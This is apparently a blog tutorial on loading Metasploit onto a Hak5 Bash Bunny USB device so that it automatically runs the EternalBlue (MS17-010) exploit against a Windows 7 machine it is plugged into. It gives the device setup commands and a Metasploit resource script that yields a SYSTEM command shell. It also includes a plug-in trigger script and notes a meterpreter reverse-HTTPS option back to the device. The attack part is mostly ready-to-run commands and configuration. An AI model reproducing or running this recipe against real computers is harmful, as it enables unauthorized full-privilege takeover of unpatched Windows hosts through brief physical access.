I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0 A-Wing that I have used 6 years ago.
Bashbunny is capable of running Metasploit framework as it has 512 MB RAM and an ARMv7 CPU (v7l) and internal 3 GB flash storage.
Eternalblue exploit that has been ported to Metasploit framework is an ideal candidate for the Bashbunny automatic exploitation. A true hacking device :)
So lets first prepare the Bashbunny device (make sure you can ssh to the device and set internet connection sharing – setup is covered here) (( I have done all the setup on a linux system))
We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny so here are the rough steps I have done
Make sure to set some date for TLS/SSL to work ;) # date -s "20170523" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.3.3 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.3.3 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate
You should be able to run Metasploit on the Bashbunny now
Now that we have a working Metasploit on the Bashbunny all that is really needed is to arm it and load the eternalblue exploit via an RC metasploit script, here is an example script eternal-cmd.rc (Remote IP is a default that DHCPD will assign to the target system that you connect the Bashbunny to)
Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 172.16.64.12 and set to only one value range 172.16.64.64 172.16.64.64
use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit
The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked)
If the target is locked we can use another payload such as :
(Something like windows/x64/meterpreter/reverse_https would be ideal as we already know the the LHOST value already for the Bashbunny
So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;)
The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position .
So ideally this would look like this (switch1 or switch 2) payload.txt
#!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH
The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on ..
After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
This is a nmap scan after the successful Eternalblue attack on the target Windows 7
Host is up, received arp-response (0.0014s latency). Scanned at 2017-05-23 23:09:43 for 149s Not shown: 990 closed ports Reason: 990 resets PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds 5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
Here is a short demo (done via VirtualBox that simulates the actual Bashbunny attack)
